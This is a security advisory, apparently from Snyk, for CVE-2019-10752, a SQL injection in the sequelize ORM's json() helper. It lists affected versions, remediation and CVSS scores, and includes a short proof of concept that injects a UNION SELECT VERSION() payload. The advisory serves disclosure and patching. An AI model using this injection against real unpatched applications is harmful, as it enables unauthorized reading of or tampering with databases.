SQL Injection
Affecting sequelize package, versions >=4.0.0 <4.44.3 || >=5.0.0 <5.15.1
Report new vulnerabilities
Do your applications use this vulnerable package?
Test your applications
Overview
sequelize is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.
Affected versions of this package are vulnerable to SQL Injection due to sequelize.json()
helper function not escaping values properly when formatting sub paths for JSON queries for MySQL, MariaDB and SQLite.
PoC by Snyk
const Sequelize = require('./');
const sequelize = new Sequelize('mysql', 'root', 'root', {
host: 'localhost',
port: '3306',
dialect: 'mariadb',
logging: console.log,
});
class Project extends Sequelize.Model {}
Project.init({
name: Sequelize.STRING,
target: Sequelize.JSON,
}, {
sequelize,
tableName: 'projects',
});
(async () => {
await sequelize.sync();
console.log(await Project.findAll({
where: {name: sequelize.json("target.id')) = 10 UNION SELECT VERSION(); -- ", 10)},
attributes: ['name'],
raw: true,
}));
})();
Remediation
Upgrade sequelize
to version 4.44.3, 5.15.1 or higher.
References
CVSS Score
7.3
high severity
-
Attack VectorNetwork
-
Attack ComplexityLow
-
Privileges RequiredNone
-
User InteractionNone
-
ScopeUnchanged
-
ConfidentialityLow
-
IntegrityLow
-
AvailabilityLow
- Credit
- Snyk Security Team
- CVE
- CVE-2019-10752
- CWE
- CWE-89
- Snyk ID
- SNYK-JS-SEQUELIZE-459751
- Disclosed
- 18 Aug, 2019
- Published
- 19 Aug, 2019